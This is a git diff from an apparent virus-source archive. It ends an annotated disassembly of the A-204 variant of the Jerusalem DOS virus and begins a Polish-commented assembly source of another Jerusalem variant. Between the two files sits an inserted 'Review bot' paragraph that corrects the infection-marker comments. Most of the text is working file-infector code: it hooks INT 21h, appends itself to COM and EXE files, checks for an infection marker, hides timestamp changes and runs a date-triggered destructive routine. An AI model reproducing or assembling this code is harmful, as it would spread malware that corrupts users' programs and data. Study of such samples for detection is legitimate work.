+047B 72 F0 JB 046D ; No: -> 046Dh +047D 2E 8B 16 80 00 CS MOV DX,W[080] ; Restore DX's ASCIZ Filename +0482 1E PUSH DS +0483 07 POP ES +0484 32 C0 XOR AL,AL ; AL=00h +0486 B9 41 00 MOV CX,041 ; +0489 F2 AE REPNE SCASB ; Check if filename +048B 2E 8B 36 80 00 CS MOV SI,W[080] ; is in UPPERCASE +0490 8A 04 MOV AL,B[SI] ; +0492 0A C0 OR AL,AL ; All UPPERRCASE? +0494 74 0E JE 04A4 ; IF so: -> 04A4h +0496 3C 61 CMP AL,061 ; AL<'a' ? +0498 72 07 JB 04A1 ; Yes: -> 04A1h +049A 3C 7A CMP AL,07A ; AL>'z' ? +049C 77 03 JA 04A1 ; Yes: -> 04A1h +049E 80 2C 20 SUB B[SI],020 ; Transfer filename + ; into UPPERCASE +04A1 46 INC SI ; SI=SI+1 +04A2 EB EC JMP 0490 + +04A4 B9 0B 00 MOV CX,0B ; CX=0Bh +04A7 2B F1 SUB SI,CX ; Return SI to start + ; of Filename +04A9 BF 84 00 MOV DI,084 ; Start of COMMAND.COM + ; filename +04AC 0E PUSH CS +04AD 07 POP ES +04AE B9 0B 00 MOV CX,0B +04B1 F3 A6 REPE CMPSB ; Filename=COMMAND.COM ? +04B3 75 03 JNE 04B8 ; No: -> 04B8h +04B5 E9 2F 02 JMP 06E7 ; Yes: -> 06E7h + + ; We come here if the + ; loaded program is not + ; COMMAND.COM +04B8 B8 00 43 MOV AX,04300 ; +04BB CD 21 INT 021 ; Get File Attributes + +04BD 72 05 JB 04C4 ; If Error: -> 04C4h +04BF 2E 89 0E 72 00 CS MOV W[072],CX ; Store File Attributes +04C4 72 25 JB 04EB ; If Error: -> 04EBh +04C6 32 C0 XOR AL,AL ; AL=00h +04C8 2E A2 4E 00 CS MOV B[04E],AL ; Dummy=0 +04CC 1E PUSH DS ; +04CD 07 POP ES ; +04CE 8B FA MOV DI,DX ; +04D0 B9 41 00 MOV CX,041 ; +04D3 F2 AE REPNE SCASB ; +04D5 80 7D FE 4D CMP B[DI-2],04D ; "M" ? +04D9 74 0B JE 04E6 ; Yes: -> 04E6h +04DB 80 7D FE 6D CMP B[DI-2],06D ; "m" ? 
+04DF 74 05 JE 04E6 ; Yes: -> 04E6h +04E1 2E FE 06 4E 00 CS INC B[04E] ; Dummy=Dummy+1 +04E6 B8 00 3D MOV AX,03D00 ; Open Disk File with +04E9 CD 21 INT 021 ; handle in compatibility + ; mode + ; DS:DX : -> ASCIZ Filename + +04EB 72 5A JB 0547 ; IF Error: -> 0547h +04ED 2E A3 70 00 CS MOV W[070],AX ; Store File Handle +04F1 8B D8 MOV BX,AX ; BX=File Handle +04F3 B8 02 42 MOV AX,04202 ; Move File Read/Write + ; Pointer (LSEEK) with + ; offset from end of file +04F6 B9 FF FF MOV CX,-1 ; CX:DX = offset in bytes +04F9 BA FB FF MOV DX,-5 ; +04FC CD 21 INT 021 ; + ; DX:AX = new absolute + ; offset from beginning of + ; file + +04FE 72 EB JB 04EB ; If Error: -> 04EBh +0500 05 05 00 ADD AX,5 ; ???? +0503 2E A3 11 00 CS MOV W[011],AX ; Store Length of File + +0507 B9 05 00 MOV CX,5 ; Read from a file with +050A BA 6B 00 MOV DX,06B ; handle BX 5h bytes into +050D 8C C8 MOV AX,CS ; DS:DX buffer +050F 8E D8 MOV DS,AX ; +0511 8E C0 MOV ES,AX ; +0513 B4 3F MOV AH,03F ; +0515 CD 21 INT 021 ; + +0517 8B FA MOV DI,DX ; DI=DX=6Bh +0519 BE 05 00 MOV SI,5 ; SI=05h +051C F3 A6 REPE CMPSB ; Check first 5 bytes to see + ; if a file already is + ; infected +051E 75 07 JNE 0527 ; If not: -> 0527h +0520 B4 3E MOV AH,03E ; Close a file with +0522 CD 21 INT 021 ; handle + +0524 E9 C0 01 JMP 06E7 ; Jump -> 06E7h + +0527 B8 24 35 MOV AX,03524 ; Get original int 24h +052A CD 21 INT 021 ; vector. 
Stored in ES:BX + +052C 89 1E 1B 00 MOV W[01B],BX ; Store BX of INT 24h vector +0530 8C 06 1D 00 MOV W[01D],ES ; Store ES of INT 24h vector +0534 BA 1B 02 MOV DX,021B ; Set new int 24h vector +0537 B8 24 25 MOV AX,02524 ; to DS:DX +053A CD 21 INT 021 ; + +053C C5 16 80 00 LDS DX,[080] ; DS:DX=Filename +0540 33 C9 XOR CX,CX ; Get fileattributes +0542 B8 01 43 MOV AX,04301 ; Put File Attributes +0545 CD 21 INT 021 ; (CHMOD) + +0547 72 3B JB 0584 ; If Error: -> 0584h +0549 2E 8B 1E 70 00 CS MOV BX,W[070] ; Close a file with +054E B4 3E MOV AH,03E ; handle BX +0550 CD 21 INT 021 ; + +0552 2E C7 06 70 00 FF FF CS MOV W[070],-1 ; File Handle=-1 ??? +0559 B8 02 3D MOV AX,03D02 ; Open File with +055C CD 21 INT 021 ; Handle in READ/WRITE mode + +055E 72 24 JB 0584 ; If Error: -> 0584h +0560 2E A3 70 00 CS MOV W[070],AX ; Store File Handle +0564 8C C8 MOV AX,CS +0566 8E D8 MOV DS,AX +0568 8E C0 MOV ES,AX + +056A 8B 1E 70 00 MOV BX,W[070] ; BX=File Handle +056E B8 00 57 MOV AX,05700 ; Get File' date/time- +0571 CD 21 INT 021 ; stamp + +0573 89 16 74 00 MOV W[074],DX ; Move File Read/Write Pointer +0577 89 0E 76 00 MOV W[076],CX ; (LSEEK) with offset from +057B B8 00 42 MOV AX,04200 ; beginning of file with +057E 33 C9 XOR CX,CX ; CX:DX bytes +0580 8B D1 MOV DX,CX ; +0582 CD 21 INT 021 ; + +0584 72 3D JB 05C3 ; If Error: -> 05C3h +0586 80 3E 4E 00 00 CMP B[04E],0 ; '0'? 
+058B 74 03 JE 0590 ; Yes: -> 0590h +058D EB 57 JMP 05E6 ; JUMP -> 05E6h + +058F 90 NOP + +0590 BB 00 10 MOV BX,01000 ; Number of 16d-byte para- + ; graphs BX=1000h For COM- + ; files there are 1000h 16d + ; bytes paragrahs available +0593 B4 48 MOV AH,048 ; +0595 CD 21 INT 021 ; Allocate Memory + +0597 73 0B JAE 05A4 ; If enough memory available + ; -> 05A4h +0599 B4 3E MOV AH,03E ; Close a file with +059B 8B 1E 70 00 MOV BX,W[070] ; handle BX +059F CD 21 INT 021 ; + +05A1 E9 43 01 JMP 06E7 ; JUMP -> 06E7h + +05A4 FF 06 8F 00 INC W[08F] ; Set Memory-Available + ; Variable (0001h) +05A8 8E C0 MOV ES,AX ; +05AA 33 F6 XOR SI,SI ; SI=0000h +05AC 8B FE MOV DI,SI ; DI=0000h +05AE B9 10 07 MOV CX,0710 ; CX=0710h (1808d) + ; length of virus +05B1 F3 A4 REP MOVSB ; Put virus code at begin- + ; ning of buffer ES:DI +05B3 8B D7 MOV DX,DI ; DX=DI=0710h +05B5 8B 0E 11 00 MOV CX,W[011] ; Restore Length of File +05B9 8B 1E 70 00 MOV BX,W[070] ; Restore File Handle +05BD 06 PUSH ES ; Read from a file with +05BE 1F POP DS ; handle CX (length +05BF B4 3F MOV AH,03F ; of file) bytes in buffer +05C1 CD 21 INT 021 ; DS:DX + +05C3 72 1C JB 05E1 ; If Error: -> 05E1h +05C5 03 F9 ADD DI,CX ; DI=Length of original + ; file+0710h (length of + ; viruscode)+05h +05C7 33 C9 XOR CX,CX ; CX=0000h +05C9 8B D1 MOV DX,CX ; Move file read/write +05CB B8 00 42 MOV AX,04200 ; pointer with offset from +05CE CD 21 INT 021 ; beginning of file + +05D0 BE 05 00 MOV SI,5 ; +05D3 B9 05 00 MOV CX,5 ; +05D6 F3 2E A4 REP CS MOVSB ; +05D9 8B CF MOV CX,DI ; CX=0715h(1813d)+length of + ; original code +05DB 33 D2 XOR DX,DX ; DX=0000h +05DD B4 40 MOV AH,040 ; Write to file with handle +05DF CD 21 INT 021 ; CX bytes + +05E1 72 0D JB 05F0 ; If Error: -> 05F0h +05E3 E9 BC 00 JMP 06A2 ; JUMP -> 06A2h + +05E6 B9 1C 00 MOV CX,01C ; Read CX (1Ch) bytes from +05E9 BA 4F 00 MOV DX,04F ; file with handle +05EC B4 3F MOV AH,03F ; +05EE CD 21 INT 021 ; + +05F0 72 4A JB 063C ; If Error: -> 063Ch +05F2 C7 06 61 00 84 19 MOV 
W[061],01984 ; Store 1984h=6532d +05F8 A1 5D 00 MOV AX,W[05D] ; +05FB A3 45 00 MOV W[045],AX ; +05FE A1 5F 00 MOV AX,W[05F] ; +0601 A3 43 00 MOV W[043],AX ; +0604 A1 63 00 MOV AX,W[063] ; +0607 A3 47 00 MOV W[047],AX ; +060A A1 65 00 MOV AX,W[065] ; +060D A3 49 00 MOV W[049],AX ; +0610 A1 53 00 MOV AX,W[053] ; +0613 83 3E 51 00 00 CMP W[051],0 ; '0000'? +0618 74 01 JE 061B ; Yes: -> 061Bh +061A 48 DEC AX ; AX=AX-01h +061B F7 26 78 00 MUL W[078] ; +061F 03 06 51 00 ADD AX,W[051] ; +0623 83 D2 00 ADC DX,0 ; +0626 05 0F 00 ADD AX,0F ; +0629 83 D2 00 ADC DX,0 ; +062C 25 F0 FF AND AX,-010 ; +062F A3 7C 00 MOV W[07C],AX ; Store AX +0632 89 16 7E 00 MOV W[07E],DX ; Store DX +0636 05 10 07 ADD AX,0710 ; AX=AX+1808 +0639 83 D2 00 ADC DX,0 ; +063C 72 3A JB 0678 ; If Error :-> 0678h +063E F7 36 78 00 DIV W[078] ; +0642 0B D2 OR DX,DX ; +0644 74 01 JE 0647 ; +0646 40 INC AX ; AX=AX+01h +0647 A3 53 00 MOV W[053],AX ; +064A 89 16 51 00 MOV W[051],DX ; +064E A1 7C 00 MOV AX,W[07C] ; Restore AX +0651 8B 16 7E 00 MOV DX,W[07E] ; Restore DX +0655 F7 36 7A 00 DIV W[07A] ; +0659 2B 06 57 00 SUB AX,W[057] ; +065D A3 65 00 MOV W[065],AX ; +0660 C7 06 63 00 C5 00 MOV W[063],0C5 ; +0666 A3 5D 00 MOV W[05D],AX ; +0669 C7 06 5F 00 10 07 MOV W[05F],0710 ; +066F 33 C9 XOR CX,CX ; CX=0000h +0671 8B D1 MOV DX,CX ; DX=0000h +0673 B8 00 42 MOV AX,04200 ; Move File Read/Write +0676 CD 21 INT 021 ; pointer to beginning of + ; file + +0678 72 0A JB 0684 ; If Error: -> 0684h +067A B9 1C 00 MOV CX,01C ; CX=1Ch +067D BA 4F 00 MOV DX,04F ; DX=4Fh +0680 B4 40 MOV AH,040 ; Write to file with +0682 CD 21 INT 021 ; handle + +0684 72 11 JB 0697 ; If Error: -> 0697h +0686 3B C1 CMP AX,CX ; Are all bytes written? 
+0688 75 18 JNE 06A2 ; No: -> 06A2h +068A 8B 16 7C 00 MOV DX,W[07C] ; Restore AX into DX +068E 8B 0E 7E 00 MOV CX,W[07E] ; Restore DX into CX +0692 B8 00 42 MOV AX,04200 +0695 CD 21 INT 021 + +0697 72 09 JB 06A2 ; If Error: -> 06A2h +0699 33 D2 XOR DX,DX ; DX=0000h +069B B9 10 07 MOV CX,0710 ; CX=0710h +069E B4 40 MOV AH,040 +06A0 CD 21 INT 021 + +06A2 2E 83 3E 8F 00 00 CS CMP W[08F],0 ; Not Enough Memory? +06A8 74 04 JE 06AE ; Yes: -> 06AEh +06AA B4 49 MOV AH,049 ; Free memory +06AC CD 21 INT 021 ; + +06AE 2E 83 3E 70 00 FF CS CMP W[070],-1 +06B4 74 31 JE 06E7 +06B6 2E 8B 1E 70 00 CS MOV BX,W[070] ; Restore File Handle +06BB 2E 8B 16 74 00 CS MOV DX,W[074] ; Restore File Date +06C0 2E 8B 0E 76 00 CS MOV CX,W[076] ; Restore File Time +06C5 B8 01 57 MOV AX,05701 ; Set File's Date/Time +06C8 CD 21 INT 021 ; stamp + +06CA B4 3E MOV AH,03E ; Close a file with +06CC CD 21 INT 021 ; handle + +06CE 2E C5 16 80 00 CS LDS DX,[080] ; Get place (DS:DX) of + ; filename +06D3 2E 8B 0E 72 00 CS MOV CX,W[072] ; Restore File Attributes +06D8 B8 01 43 MOV AX,04301 ; Put File Attributes +06DB CD 21 INT 021 ; + +06DD 2E C5 16 1B 00 CS LDS DX,[01B] ; Restore original vector +06E2 B8 24 25 MOV AX,02524 ; of interrupt 24h +06E5 CD 21 INT 021 ; + +06E7 07 POP ES ; Restore Registers +06E8 1F POP DS +06E9 5F POP DI +06EA 5E POP SI +06EB 5A POP DX +06EC 59 POP CX +06ED 5B POP BX +06EE 58 POP AX +06EF 9D POPF ; Restore Flags +06F0 2E FF 2E 17 00 CS JMP D[017] ; Call original INT 21h + ; address which was intercep- + ; ted with the LOAD & EXEC. + ; statement. Which means it + ; will load and execute the + ; selected file + +06F5 00 00 00 00 00 00 00 00 00 00 00 + +0700 4D DE 0C 00 10 00 00 00 00 00 00 00 00 00 00 00 + +0710 E9 92 00 JMP 07A5 ; JUMP -> 07A5h + +0711h til 07A4h are the same definition words/bytes as at 0103h til 0194h + +07A5 FC CLD +07A6 B4 E0 MOV AH,0E0 +07A8 CD 21 INT 021 + +07AA 80 FC E0 CMP AH,0E0 ; AH>=E0h? 
+07AD 73 16 JAE 07C5 ; Yes: -> 07C5h +07AF 80 FC 03 CMP AH,3 ; AH<03h +07B2 72 11 JB 07C5 ; Yes: -> 07C5h + ; The only way that the + ; code get passed here if + ; the virus is active in + ; memory. It will return + ; AX=0300h then. +07B4 B4 DD MOV AH,0DD +07B6 BF 00 01 MOV DI,0100 ; DI=0100h +07B9 BE 10 07 MOV SI,0710 ; SI=0710h +07BC 03 F7 ADD SI,DI ; SI=0810h +07BE 2E 8B 8D 11 00 CS MOV CX,W[DI+011]; CX=Length of file +07C3 CD 21 INT 021 + +07C5 8C C8 MOV AX,CS ; AX=CS +07C7 05 10 00 ADD AX,010 ; AX=AX+10h +07CA 8E D0 MOV SS,AX ; SS=CS+10h +07CC BC 00 07 MOV SP,0700 ; SP=0700h +07CF 50 PUSH AX ; Store AX +07D0 B8 C5 00 MOV AX,0C5 ; AX=00C5h +07D3 50 PUSH AX ; Store AX +07D4 CB RETF ; RETURN from FAR + +07D5 FC CLD ; Clear Direct + + ; Here the A-204 variant + ; differs from the original + ; Jerusalem Version B virus + ; for the second time. +07D6 2E 8C 06 31 00 CS MOV W[031],ES ; These two lines have +07DB 06 PUSH ES ; been changed in order + ; trying to avoid being + ; detected by the finger- + ; print in the VirScan.Dat + ; file. It has not succeeded + ; because the strain VirScan + ; searches for appears two + ; times in the viruscode + +07DC 2E 8C 06 39 00 CS MOV W[039],ES ; Store ES +07E1 2E 8C 06 3D 00 CS MOV W[03D],ES ; Store ES +07E6 2E 8C 06 41 00 CS MOV W[041],ES ; Store ES + +07EB 8C C0 MOV AX,ES ; AX=ES +07ED 05 10 00 ADD AX,010 ; AX=AX+10h +07F0 2E 01 06 49 00 CS ADD W[049],AX ; Store ES+10h +07F5 2E 01 06 45 00 CS ADD W[045],AX ; Store ES+10h + +07FA B4 E0 MOV AH,0E0 ; AH=E0h +07FC CD 21 INT 021 ; + +07FE 80 FC E0 CMP AH,0E0 ; AH>=E0? +0801 73 13 JAE 0816 ; Yes: -> 0816h + ; This will never happen. + ; First of all it would be + ; a short jump into the + ; original program. 
Secondly + ; is the virus already active + ; in memory and will return + ; AX=0300h at the INT 21h call + ; with AH=E0h +0803 80 FC 03 CMP AH,3 ; AH=03h +0806 07 POP ES ; Restore ES +0807 2E 8E 16 45 00 CS MOV SS,W[045] ; Restore ES+10 into SS +080C 2E 8B 26 43 90 CS MOV SP,W[09043] ; + +0810 90 NOP ; Start ofOriginal Program +0811 90 NOP +0812 90 NOP +0813 90 NOP +0814 90 NOP +0815 90 NOP +0816 90 NOP +0817 90 NOP +0818 90 NOP +0819 90 NOP +081A 90 NOP +081B 90 NOP +081C 90 NOP +081D 90 NOP +081E 90 NOP +081F 90 NOP +0820 90 NOP +0821 90 NOP +0822 90 NOP +0823 90 NOP +0824 90 NOP +0825 90 NOP +0826 90 NOP +0827 90 NOP +0828 90 NOP +0829 90 NOP +082A 90 NOP +082B 90 NOP +082C 90 NOP +082D 90 NOP +082E 90 NOP +082F C3 RET ; End of Original Program + +0830 2D 32 30 34 2A ; -204* + +NOTE: A-204 is a course-code for IAP (Inleiding Apparatuur en Programmatuur, +in English a Prologue in Hardware and Software) at my university. In this +course the PDP-11 Language is being teached. It's my opion, and my opion only, +that this change has been made by a first year student. The IAP-course is +a course for first years students. Only some lines were changed in order to +avoid detection. If the 'author' did know more about the 8086, (s?)he could +have optimized the code. Some pieces can be done much more elegant. \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.j_sundyb.asm b/MSDOS/Virus.MSDOS.Unknown.j_sundyb.asm new file mode 100644 index 00000000..9bfc41d7 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.j_sundyb.asm 
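Review bot: The annotation `0103 db 2A,41,2D,32,30,34,2A ; *A-204* never used` is wrong, and the error matters for anyone building detection from this listing: bytes 0005h–0009h (`-204*`) are the infection marker — 04F3h–0515h seek to EOF−5 and read five bytes into 006Bh, 0517h–051Ch compare them against CS:0005, and 05D0h–05D6h (`MOV SI,5` / `MOV CX,5` / `REP CS MOVSB`) append the same five bytes after the host image, which is what the dump shows at `0830 2D 32 30 34 2A ; -204*`. The comment at 051Ch should therefore read `; Compare the LAST 5 bytes of the file with the marker at CS:0005 ("-204*"); equal = already infected`, and the 0103h line `; "*A-204*": 0005h-0009h is the EOF infection marker (cf. 051Ch/05D6h) — this variant replaced the "MsDos" marker seen in the j_1808 listing of this same patch, which is presumably how it dodged string scanners`. The data-area note `017A dw 10 00 ; 0001h= 1d` misreads its own bytes: 0010h = 16d, and `DIV W[07A]` at 0655h uses it as the bytes-per-paragraph divisor when deriving the EXE header's CS/SS values, so write `; 0010h=16d bytes per paragraph, divisor at 0655h`. Two comments give the self-recognition value as `0Eh` (`01EE ... ; AH>=0Eh?` and `035C ... ; AH=0Eh ?`) where the compared immediate is E0h, and `0468 CMP AX,-1 ; No Sectors Free?` is misleading since, per the DOS API, AX=FFFFh from function 36h signals an invalid drive while the zero-free-space case is caught by the `MUL BX` / `CMP AX,0710` path just below.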
@@ -0,0 +1,727 @@ +; COM - na poczatku +; EXE - na koncu +; rozpoznaje wg nazwy (co nie COM = EXE) +;------- +; aktywacja w niedziele roku roznego od 1989 +; procedury niszczacej +;------- +; doniesienia co 30 minut +; ale nigdy nie wlaczone +;------- +; Nie zaraza COMMAND.COM'a +;------- + +LF EQU 0AH +CR EQU 0DH + +;INITIAL VALUES : CS:IP 0918:00C4 +; SS:SP 0918:065D + +;---------------- +; <- tutaj cialo programu +;---------------- + +S9180 SEGMENT STACK + ASSUME DS:S9180, SS:S9180 ,CS:S9180 ,ES:S9180 +L9180: jmp L0095 ;L9215 ;9180 E9 92 00 + + db 73h,55h ;'sU' ;9183 73 55 + + ;<- wzorzec sygnatury zarazenia +L0005 DB 0C8H,0F7h,0E1h,0EEh,0E7h ;9185 C8 F7 E1 EE E7 + +L000A dw 100h ;IP nosiciela COM ;918A 00 01 +L000C dw 1905h ;CS nosiciela COM ;918C 05 19 + +L000E db 0 ;ptr aktywnosci wirusa ;918E 00 +L000F dw 0 ;918F 00 00 +L0011 dw 9374h ;dlugosc programu oryginalna ;9191 74 93 + +L0013 dw 0FEA5h ;old int 8 ;9193 A5 +L0015 dw 0F000h ;9195 00 +L0017 dw 1460h ;old int 21h ;9197 60 14 +L0019 dw 025Bh ;9199 5B 02 +L001B dw 0556h ;old int 24h ;919B 56 05 +L001D dw 0BA6h ;919D A6 0B + +L001F dw 32400 ;30 minut zwloki ;919F 90 7E + dw 0 ;91A1 00 00 + dw 0 ;91A3 00 00 + dw 0 ;91A5 00 00 + dw 0 ;91A7 00 00 + dw 0 ;91A9 00 00 + dw 0 ;91AB 00 00 + dw 0E800h ;91AD 00 E8 + dw 5F06h ;91AF 06 5F + +L0031 dw 0C89h ;adres bloku wirusa ;91B1 89 0C +L0033 dw 80h ;wielkosc bloku wirusa (para) ;91B3 80 00 + + ;<----- Parameter Block +L0035 dw 0 ;Environment ;91B5 00 00 + dw 80h ;<- command line ;91B7 80 00 +L0039 dw 0C89h ; Segment ;91B9 89 0C + dw 5Ch ;<- FCB-1 ;91BB 5C 00 +L003D dw 0C89h ; Segment ;91BD 89 0C + dw 6Ch ;<- FCB-2 ;91BF 6C 00 +L0041 dw 0C89h ; Segment ;91C1 89 0C + +L0043 dw 0800h ;SP nosiciela ;91C3 00 08 +L0045 dw 0A58h ;rel segment stosu nosiciela ;91C5 58 0A + +L0047 dw 3D73h ;IP nosiciela ;91C7 73 3D +L0049 dw 0 ;CS nosiciela (rel) ;91C9 00 00 + + ;pierwsze 3 bajty wektora int ff +L004B dw 0F000h ;91CB 00 F0 +L004D db 46h ;91CD 46 + +L004E db 1 ;0=COM, 1=EXE 
;91CE 01 + + ;<- bufor na poczatek zbioru +L004F db 'MZ' ;91CF 4D 5A +L0051 dw 01E4h ;last page bytes ;91D1 E4 01 +L0053 dw 004Dh ;file size - pages ;91D3 4D 00 + dw 0004h ;91D5 04 00 +L0057 dw 0020h ;header size (para) ;91D7 20 00 + dw 01C1h ;91D9 C1 01 + dw 0FFFFh ;91DB FF FF +L005D dw 0918h ;SS ;91DD 18 09 +L005F dw 065Dh ;SP ;91DF 5D 06 +L0061 dw 1984h ;suma kontrolna ;91E1 84 19 +L0063 dw 00C4h ;IP ;91E3 C4 00 +L0065 dw 0918h ;CS ;91E5 18 09 + dw 001Eh ;91E7 1E 00 + dw 0000h ;91E9 00 00 + + ;<- bufor na 5 ostatnich bajtow zbioru +L006B db 0Ah,0,0FFh,0FFh,0FFh ;91EB 0A 00 FF FF FF + +L0070 dw 5 ;File handle ;91F0 05 00 +L0072 dw 20h ;atrybut zarazanego zbioru ;91F2 20 00 +L0074 dw 1031h ;91F4 31 10 +L0076 dw 0A337h ;91F6 37 A3 +L0078 dw 200h ;bytes/sector(page) ;91F8 00 02 +L007A dw 10h ;bytes/paragraph ;91FA 10 00 +L007C dw 9380h ;nowa dlugosc zbioru DWORD ;91FC 80 93 +L007E dw 0 ;91FD 00 00 + +L0080 dw 41B9h ;path nazwy programu - offset ;9200 B9 41 +L0082 dw 9B2Ah ; - segment ;9202 2A 9B + +L0084 db 'COMMAND.COM' ;9294 43 4F 4D 4D 41 4E 44 2E 43 4F 4D +L008F dw 0,0,0 ;929F 00 00 00 00 00 00 + +;================================================ +; <- Start wirusa zbiorow COM +;------------------------------------------------ +L0095: CLD ;9215 FC + MOV AH,0FFH ;kontrola rezydowania ;9216 B4 FF + INT 21H ;9218 CD 21 + CMP AH,0FFH ;921A 80 FC FF + JNB L9234 ;-> nie rezyduje ;921D 73 15 + CMP AH,4 ;921F 80 FC 04 + JB L9234 ;-> nie rezyduje ;9222 72 10 + ;<- wirus juz rezyduje + MOV AH,0DDH ;uruchom program ;9224 B4 DD + MOV DI,100h ;miejsce docelowe programu ;9226 BF 00 01 + MOV SI,OFFSET L065F ;9229 BE 5F 06 + ADD SI,DI ;miejsce aktualne programu ;922C 03 F7 + MOV CX,CS:[DI+11H] ;dlugosc programu oryginalna ;922E 2E 8B 4D 11 + INT 21H ;9232 CD 21 + +L9234: MOV AX,CS ;normalizacja segmentu ;9234 8C C8 + ADD AX,10h ;9236 05 10 00 + MOV SS,AX ;9239 8E D0 + MOV SP,OFFSET L065D ;923B BC 5D 06 + PUSH AX ;segment ;923E 50 + MOV AX,OFFSET L00C4 ;=L9244 ;923F B8 C4 00 + 
PUSH AX ;offset ;9242 50 + RETF ;9243 CB + +;================================================ +; <- Start wirusa zbioru EXE +;------------------------------------------------ +L00C4: +L9244: CLD ;9244 FC + PUSH ES ;<- PSP ;9245 06 + MOV CS:L0031,ES ;9246 2E 8C 06 31 00 + MOV CS:L0039,ES ;924B 2E 8C 06 39 00 + MOV CS:L003D,ES ;9250 2E 8C 06 3D 00 + MOV CS:L0041,ES ;9255 2E 8C 06 41 00 + MOV AX,ES ;segment poczatku pgm ;925A 8C C0 + ADD AX,10h ;925C 05 10 00 + ADD CS:L0049,AX ;relokowanie CS ;925F 2E 01 06 49 00 + ADD CS:L0045,AX ;relokowanie SS ;9264 2E 01 06 45 00 + MOV AH,0FFH ;czy juz rezyduje ? ;9269 B4 FF + INT 21H ;926B CD 21 + CMP AH,4 ;926D 80 FC 04 + JNZ L9282 ;-> jeszcze nie ;9270 75 10 + + POP ES ;<- uruchomienie pgm ;9272 07 + MOV SS,CS:L0045 ;inicjacja stosu ;9273 2E 8E 16 45 00 + MOV SP,CS:L0043 ;9278 2E 8B 26 43 00 + JMP DWORD PTR CS:L0047 ;uruchomienie nosiciela ;927D 2E FF 2E 47 00 + + ;<- zarezydowanie +L9282: XOR AX,AX ;9282 33 C0 + MOV ES,AX ;9284 8E C0 + MOV BX,03FCh ;int 0ffh ;9286 BB FC 03 + MOV AX,ES:[BX] ;9289 26 8B 07 + MOV CS:L004B,AX ;928C 2E A3 4B 00 + MOV AL,ES:[BX+2] ;9290 26 8A 47 02 + MOV CS:L004D,AL ;9294 2E A2 4D 00 + MOV WORD PTR ES:[BX],0A5F3h ;rep movsw ;9298 26 C7 07 F3 A5 + MOV BYTE PTR ES:[BX+2],0CBH ;ret ;929D 26 C6 47 02 CB + POP AX ;92A2 58 + ADD AX,10h ;92A3 05 10 00 + MOV ES,AX ;92A6 8E C0 + PUSH CS ;92A8 0E + POP DS ;92A9 1F + MOV CX,OFFSET L065F ;dl. wir. 
bez podpisu ;92AA B9 5F 06 + SHR CX,1 ;na slowa ;92AD D1 E9 + XOR SI,SI ;offset zrodlowy ;92AF 33 F6 + MOV DI,SI ;offset wynikowy ;92B1 8B FE + PUSH ES ;segment przepisanego ;92B3 06 + MOV AX,OFFSET L013C ;offset kontynuacji ;92B4 B8 3C 01 + PUSH AX ;92B7 50 + JMP DWORD PTR L05F6 ;skok w wektor int FF ;92B8 FF 2E F6 05 + + ;<- kontynuacja na nowym miejscu +L013C: MOV AX,CS ;92BC 8C C8 + MOV SS,AX ;92BE 8E D0 + MOV SP,OFFSET L065D ;92C0 BC 5D 06 + XOR AX,AX ;92C3 33 C0 + MOV DS,AX ;92C5 8E D8 + MOV AX,CS:L004B ;odtworzenie wektora int ff ;92C7 2E A1 4B 00 + MOV [BX],AX ;92CB 89 07 + MOV AL,CS:L004D ;92CD 2E A0 4D 00 + MOV [BX+2],AL ;92D1 88 47 02 + + MOV BX,SP ;sp -> paragraf ;92D4 8B DC + MOV CL,4 ;92D6 B1 04 + SHR BX,CL ;92D8 D3 EB + ADD BX,20h ;+512 ;92DA 83 C3 20 + and bx,0fff0h ;92DD 83 E3 F0 + MOV CS:L0033,BX ;paragrafy bloku potrzebne ;92E0 2E 89 1E 33 00 + MOV AH,4AH ;Set Block ;92E5 B4 4A + MOV ES,CS:L0031 ;segment bloku ;92E7 2E 8E 06 31 00 + INT 21H ;92EC CD 21 + MOV AX,3521h ;Get int 21h ;92EE B8 21 35 + INT 21H ;92F1 CD 21 + MOV CS:L0017,BX ;92F3 2E 89 1E 17 00 + MOV CS:L0019,ES ;92F8 2E 8C 06 19 00 + PUSH CS ;92FD 0E + POP DS ;92FE 1F + MOV DX,OFFSET L02D2 ;92FF BA D2 02 + MOV AX,2521h ;Set int 21h ;9302 B8 21 25 + INT 21H ;9305 CD 21 + MOV ES,[L0031] ;segment wirusa ;9307 8E 06 31 00 + MOV ES,ES:[2Ch] ;environment ;930B 26 8E 06 2C 00 + XOR DI,DI ;szukamy nazwy nosiciela ;9310 33 FF + MOV CX,7FFFh ;9312 B9 FF 7F + XOR AL,AL ;9315 32 C0 +L9317: REPNZ SCASB ;9317 F2 AE + CMP ES:[DI],AL ;9319 26 38 05 + LOOPNZ L9317 ;931C E0 F9 + MOV DX,DI ;pathname offset ;931E 8B D7 + ADD DX,3 ;9320 83 C2 03 + + MOV AX,4B00h ;Load & Execute nosiciela ;9323 B8 00 4B + PUSH ES ;9326 06 + POP DS ;pathname segment ;9327 1F + PUSH CS ;9328 0E + POP ES ;parameter block ;9329 07 + MOV BX,OFFSET L0035 ;parameter block ;932A BB 35 00 + PUSH DS ;932D 1E + PUSH ES ;932E 06 + PUSH AX ;932F 50 + PUSH BX ;9330 53 + PUSH CX ;9331 51 + PUSH DX ;9332 52 + MOV AH,2AH ;Get Date ;9333 B4 
2A + INT 21H ;9335 CD 21 + MOV BYTE PTR CS:L000E,0 ;ptr aktywnosci wirusa ;9337 2E C6 06 0E 00 00 + CMP CX,1989 ;rok ;933D 81 F9 C5 07 + JZ L936F ;-> tak ;9341 74 2C + +; Mistake! Range for AL is 0 ..6 ! + + CMP AL,7 ;niedziela ? ;9343 3C 07 + JNZ L9350 ;-> nie ;9345 75 09 + INC BYTE PTR CS:L000E ;ptr aktywnosci wirusa ;9347 2E FE 06 0E 00 + JMP SHORT L936F ;934C EB 21 + + NOP ;934E 90 + NOP ;934F 90 + + ;<- to nie niedziela i rok nie 1989 +L9350: MOV AX,3508h ;Get int 8 ;9350 B8 08 35 + INT 21H ;9353 CD 21 + MOV CS:L0013,BX ;9355 2E 89 1E 13 00 + MOV CS:L0015,ES ;935A 2E 8C 06 15 00 + PUSH CS ;935F 0E + POP DS ;9360 1F + MOV WORD PTR L001F,32400 ;30 minut ;9361 C7 06 1F 00 90 7E + MOV AX,2508h ;Set int 8 ;9367 B8 08 25 + MOV DX,OFFSET L0216 ;936A BA 16 02 + INT 21H ;936D CD 21 +L936F: POP DX ;936F 5A + POP CX ;9370 59 + POP BX ;9371 5B + POP AX ;9372 58 + POP ES ;9373 07 + POP DS ;9374 1F + PUSHF ;9375 9C + CALL DWORD PTR CS:L0017 ;old int 21h (run) ;9376 2E FF 1E 17 00 + 